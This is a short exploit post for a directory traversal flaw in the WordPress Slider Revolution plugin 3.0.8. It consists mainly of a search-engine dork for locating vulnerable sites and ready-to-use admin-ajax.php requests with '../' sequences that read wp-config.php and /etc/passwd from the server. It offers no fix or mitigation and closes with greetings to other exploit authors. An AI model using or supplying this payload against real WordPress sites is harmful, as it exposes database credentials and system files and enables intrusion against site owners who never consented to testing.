WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.
129c075ad285b288723e5f16312e3c90c87bccd10a3436f09ab9fdb5cfb03d53====================================================================================================================================
| # Title : WordPress - Slider Revolution 3.0.8 Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) |
| # Vendor : https://www.sliderrevolution.com/ |
| # Dork : index of revslider\backup |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[+] http://127.0.0.1/kalypsohotelcom/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../../../../../../../../../../../etc/passwd
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |
|
=======================================================================================================================================